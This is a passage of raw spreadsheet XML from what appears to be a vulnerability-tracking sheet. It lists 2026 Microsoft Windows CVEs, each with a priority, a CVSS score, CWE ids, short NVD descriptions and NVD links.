t="inlineStr"><is><t>CWE-125</t></is></c><c r="S375" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t></is></c></row><row r="376"><c r="A376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C376" s="5" t="inlineStr"><is><t>CVE-2026-69346</t></is></c><c r="D376" s="5" t="n"><v>8</v></c><c r="E376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G376" s="5" t="inlineStr" /><c r="H376" s="5" t="n"><v>0.007</v></c><c r="I376" s="5" t="inlineStr" /><c r="J376" s="5" t="inlineStr" /><c r="K376" s="5" t="inlineStr" /><c r="L376" s="5" t="inlineStr" /><c r="M376" s="5" t="inlineStr" /><c r="N376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P376" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q376" s="5" t="inlineStr" /><c r="R376" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S376" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t></is></c></row><row r="377"><c r="A377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C377" s="5" t="inlineStr"><is><t>CVE-2026-69365</t></is></c><c r="D377" s="5" t="n"><v>8</v></c><c r="E377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G377" s="5" t="inlineStr" /><c r="H377" s="5" t="n"><v>0.007</v></c><c r="I377" s="5" t="inlineStr" /><c r="J377" s="5" t="inlineStr" /><c r="K377" s="5" t="inlineStr" /><c r="L377" s="5" t="inlineStr" /><c r="M377" s="5" t="inlineStr" /><c r="N377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P377" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q377" s="5" t="inlineStr" /><c r="R377" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S377" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t></is></c></row><row r="378"><c r="A378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C378" s="5" t="inlineStr"><is><t>CVE-2026-69371</t></is></c><c r="D378" s="5" t="n"><v>8</v></c><c r="E378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G378" s="5" t="inlineStr" /><c r="H378" s="5" t="n"><v>0.007</v></c><c r="I378" s="5" t="inlineStr" /><c r="J378" s="5" t="inlineStr" /><c r="K378" s="5" t="inlineStr" /><c r="L378" s="5" t="inlineStr" /><c r="M378" s="5" t="inlineStr" /><c r="N378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P378" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q378" s="5" t="inlineStr" /><c r="R378" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S378" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t></is></c></row><row r="379"><c r="A379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C379" s="5" t="inlineStr"><is><t>CVE-2026-69412</t></is></c><c r="D379" s="5" t="n"><v>8</v></c><c r="E379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F379" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G379" s="5" t="inlineStr" /><c r="H379" s="5" t="n"><v>0.005</v></c><c r="I379" s="5" t="inlineStr" /><c r="J379" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K379" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L379" s="5" t="inlineStr" /><c r="M379" s="5" t="inlineStr" /><c r="N379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P379" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q379" s="5" t="inlineStr" /><c r="R379" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S379" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t></is></c></row><row r="380"><c r="A380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C380" s="5" t="inlineStr"><is><t>CVE-2026-69418</t></is></c><c r="D380" s="5" t="n"><v>8</v></c><c r="E380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G380" s="5" t="inlineStr" /><c r="H380" s="5" t="n"><v>0.007</v></c><c r="I380" s="5" t="inlineStr" /><c r="J380" s="5" t="inlineStr" /><c r="K380" s="5" t="inlineStr" /><c r="L380" s="5" t="inlineStr" /><c r="M380" s="5" t="inlineStr" /><c r="N380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P380" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q380" s="5" t="inlineStr" /><c r="R380" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S380" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t></is></c></row><row r="381"><c r="A381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C381" s="5" t="inlineStr"><is><t>CVE-2026-69423</t></is></c><c r="D381" s="5" t="n"><v>8</v></c><c r="E381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G381" s="5" t="inlineStr" /><c r="H381" s="5" t="n"><v>0.007</v></c><c r="I381" s="5" t="inlineStr" /><c r="J381" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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81" s="5" t="inlineStr" /><c r="M381" s="5" t="inlineStr" /><c r="N381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P381" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q381" s="5" t="inlineStr" /><c r="R381" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S381" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t></is></c></row><row r="382"><c r="A382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C382" s="5" t="inlineStr"><is><t>CVE-2026-69427</t></is></c><c r="D382" s="5" t="n"><v>8</v></c><c r="E382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G382" s="5" t="inlineStr" /><c r="H382" s="5" t="n"><v>0.007</v></c><c r="I382" s="5" t="inlineStr" /><c r="J382" s="5" t="inlineStr" /><c r="K382" s="5" t="inlineStr" /><c r="L382" s="5" t="inlineStr" /><c r="M382" s="5" t="inlineStr" /><c r="N382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P382" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q382" s="5" t="inlineStr" /><c r="R382" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S382" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t></is></c></row><row r="383"><c r="A383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C383" s="5" t="inlineStr"><is><t>CVE-2026-69458</t></is></c><c r="D383" s="5" t="n"><v>8</v></c><c r="E383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G383" s="5" t="inlineStr" /><c r="H383" s="5" t="n"><v>0.007</v></c><c r="I383" s="5" t="inlineStr" /><c r="J383" s="5" t="inlineStr" /><c r="K383" s="5" t="inlineStr" /><c r="L383" s="5" t="inlineStr" /><c r="M383" s="5" t="inlineStr" /><c r="N383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P383" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q383" s="5" t="inlineStr" /><c r="R383" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S383" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t></is></c></row><row r="384"><c r="A384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C384" s="5" t="inlineStr"><is><t>CVE-2026-69462</t></is></c><c r="D384" s="5" t="n"><v>8</v></c><c r="E384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G384" s="5" t="inlineStr" /><c r="H384" s="5" t="n"><v>0.007</v></c><c r="I384" s="5" t="inlineStr" /><c r="J384" s="5" t="inlineStr" /><c r="K384" s="5" t="inlineStr" /><c r="L384" s="5" t="inlineStr" /><c r="M384" s="5" t="inlineStr" /><c r="N384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P384" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q384" s="5" t="inlineStr" /><c r="R384" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S384" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t></is></c></row><row r="385"><c r="A385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C385" s="5" t="inlineStr"><is><t>CVE-2026-69481</t></is></c><c r="D385" s="5" t="n"><v>8</v></c><c r="E385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G385" s="5" t="inlineStr" /><c r="H385" s="5" t="n"><v>0.007</v></c><c r="I385" s="5" t="inlineStr" /><c r="J385" s="5" t="inlineStr" /><c r="K385" s="5" t="inlineStr" /><c r="L385" s="5" t="inlineStr" /><c r="M385" s="5" t="inlineStr" /><c r="N385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P385" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q385" s="5" t="inlineStr" /><c r="R385" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S385" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t></is></c></row><row r="386"><c r="A386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C386" s="5" t="inlineStr"><is><t>CVE-2026-69503</t></is></c><c r="D386" s="5" t="n"><v>8</v></c><c r="E386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G386" s="5" t="inlineStr" /><c r="H386" s="5" t="n"><v>0.008</v></c><c r="I386" s="5" t="inlineStr" /><c r="J386" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K386"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386" s="5" t="inlineStr" /><c r="M386" s="5" t="inlineStr" /><c r="N386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P386" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q386" s="5" t="inlineStr" /><c r="R386" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S386" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t></is></c></row><row r="387"><c r="A387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C387" s="5" t="inlineStr"><is><t>CVE-2026-69505</t></is></c><c r="D387" s="5" t="n"><v>8</v></c><c r="E387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G387" s="5" t="inlineStr" /><c r="H387" s="5" t="n"><v>0.008</v></c><c r="I387" s="5" t="inlineStr" /><c r="J387" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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387" s="5" t="inlineStr" /><c r="M387" s="5" t="inlineStr" /><c r="N387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P387" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q387" s="5" t="inlineStr" /><c r="R387" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S387" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t></is></c></row><row r="388"><c r="A388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C388" s="5" t="inlineStr"><is><t>CVE-2026-69512</t></is></c><c r="D388" s="5" t="n"><v>8</v></c><c r="E388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G388" s="5" t="inlineStr" /><c r="H388" s="5" t="n"><v>0.008</v></c><c r="I388" s="5" t="inlineStr" /><c r="J388" s="5" t="inlineStr" /><c r="K388" s="5" t="inlineStr" /><c r="L388" s="5" t="inlineStr" /><c r="M388" s="5" t="inlineStr" /><c r="N388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P388" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q388" s="5" t="inlineStr" /><c r="R388" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t></is></c></row><row r="389"><c r="A389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C389" s="5" t="inlineStr"><is><t>CVE-2026-69619</t></is></c><c r="D389" s="5" t="n"><v>8</v></c><c r="E389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F389" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G389" s="5" t="inlineStr" /><c r="H389" s="5" t="n"><v>0.008</v></c><c r="I389" s="5" t="inlineStr" /><c r="J389" s="5" t="inlineStr" /><c r="K389" s="5" t="inlineStr" /><c r="L389" s="5" t="inlineStr" /><c r="M389" s="5" t="inlineStr" /><c r="N389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P389" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q389" s="5" t="inlineStr" /><c r="R389" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S389" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t></is></c></row><row r="390"><c r="A390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C390" s="5" t="inlineStr"><is><t>CVE-2026-69623</t></is></c><c r="D390" s="5" t="n"><v>8</v></c><c r="E390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F390" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G390" s="5" t="inlineStr" /><c r="H390" s="5" t="n"><v>0.008999999999999999</v></c><c r="I390" s="5" t="inlineStr" /><c r="J390" s="5" t="inlineStr" /><c r="K390" s="5" t="inlineStr" /><c r="L390" s="5" t="inlineStr" /><c r="M390" s="5" t="inlineStr" /><c r="N390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P390" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q390" s="5" t="inlineStr" /><c r="R390" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S390" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t></is></c></row><row r="391"><c r="A391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C391" s="5" t="inlineStr"><is><t>CVE-2026-69625</t></is></c><c r="D391" s="5" t="n"><v>8</v></c><c r="E391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F391" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G391" s="5" t="inlineStr" /><c r="H391" s="5" t="n"><v>0.007</v></c><c r="I391" s="5" t="inlineStr" /><c r="J391" s="5" t="inlineStr" /><c r="K391" s="5" t="inlineStr" /><c r="L391" s="5" t="inlineStr" /><c r="M391" s="5" t="inlineStr" /><c r="N391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P391" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q391" s="5" t="inlineStr" /><c r="R391" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S391" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t></is></c></row><row r="392"><c r="A392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C392" s="5" t="inlineStr"><is><t>CVE-2026-69643</t></is></c><c r="D392" s="5" t="n"><v>8</v></c><c r="E392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F392" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G392" s="5" t="inlineStr" /><c r="H392" s="5" t="n"><v>0.008</v></c><c r="I392" s="5" t="inlineStr" /><c r="J392" s="5" t="inlineStr" /><c r="K392" s="5" t="inlineStr" /><c r="L392" s="5" t="inlineStr" /><c r="M392" s="5" t="inlineStr" /><c r="N392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P392" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q392" s="5" t="inlineStr" /><c r="R392" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S392" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t></is></c></row><row r="393"><c r="A393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C393" s="5" t="inlineStr"><is><t>CVE-2026-69681</t></is></c><c r="D393" s="5" t="n"><v>8</v></c><c r="E393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F393" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G393" s="5" t="inlineStr" /><c r="H393" s="5" t="n"><v>0.008</v></c><c r="I393" s="5" t="inlineStr" /><c r="J393" s="5" t="inlineStr" /><c r="K393" s="5" t="inlineStr" /><c r="L393" s="5" t="inlineStr" /><c r="M393" s="5" t="inlineStr" /><c r="N393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q393" s="5" t="inlineStr" /><c r="R393" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S393" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t></is></c></row><row r="394"><c r="A394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C394" s="5" t="inlineStr"><is><t>CVE-2026-69689</t></is></c><c r="D394" s="5" t="n"><v>8</v></c><c r="E394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G394" s="5" t="inlineStr" /><c r="H394" s="5" t="n"><v>0.008</v></c><c r="I394" s="5" t="inlineStr" /><c r="J394" s="5" t="inlineStr" /><c r="K394" s="5" t="inlineStr" /><c r="L394" s="5" t="inlineStr" /><c r="M394" s="5" t="inlineStr" /><c r="N394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P394" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q394" s="5" t="inlineStr" /><c r="R394" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S394" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t></is></c></row><row r="395"><c r="A395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C395" s="5" t="inlineStr"><is><t>CVE-2026-69714</t></is></c><c r="D395" s="5" t="n"><v>8</v></c><c r="E395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G395" s="5" t="inlineStr" /><c r="H395" s="5" t="n"><v>0.008</v></c><c r="I395" s="5" t="inlineStr" /><c r="J395" s="5" t="inlineStr" /><c r="K395" s="5" t="inlineStr" /><c r="L395" s="5" t="inlineStr" /><c r="M395" s="5" t="inlineStr" /><c r="N395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P395" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q395" s="5" t="inlineStr" /><c r="R395" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S395" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t></is></c></row><row r="396"><c r="A396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C396" s="5" t="inlineStr"><is><t>CVE-2026-69717</t></is></c><c r="D396" s="5" t="n"><v>8</v></c><c r="E396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G396" s="5" t="inlineStr" /><c r="H396" s="5" t="n"><v>0.007</v></c><c r="I396" s="5" t="inlineStr" /><c r="J396" s="5" t="inlineStr" /><c r="K396" s="5" t="inlineStr" /><c r="L396" s="5" t="inlineStr" /><c r="M396" s="5" t="inlineStr" /><c r="N396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P396" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q396" s="5" t="inlineStr" /><c r="R396" s="5" t="inlineStr"><is><t>CWE-125, CWE-822, CWE-843</t></is></c><c r="S396" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t></is></c></row><row r="397"><c r="A397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C397" s="5" t="inlineStr"><is><t>CVE-2026-69727</t></is></c><c r="D397" s="5" t="n"><v>8</v></c><c r="E397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G397" s="5" t="inlineStr" /><c r="H397" s="5" t="n"><v>0.007</v></c><c r="I397" s="5" t="inlineStr" /><c r="J397" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K39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97" s="5" t="inlineStr" /><c r="M397" s="5" t="inlineStr" /><c r="N397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P397" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q397" s="5" t="inlineStr" /><c r="R397" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S397" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t></is></c></row><row r="398"><c r="A398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C398" s="5" t="inlineStr"><is><t>CVE-2026-69762</t></is></c><c r="D398" s="5" t="n"><v>8</v></c><c r="E398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G398" s="5" t="inlineStr" /><c r="H398" s="5" t="n"><v>0.007</v></c><c r="I398" s="5" t="inlineStr" /><c r="J398" s="5" t="inlineStr" /><c r="K398" s="5" t="inlineStr" /><c r="L398" s="5" t="inlineStr" /><c r="M398" s="5" t="inlineStr" /><c r="N398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P398" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q398" s="5" t="inlineStr" /><c r="R398" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S398" s="5" 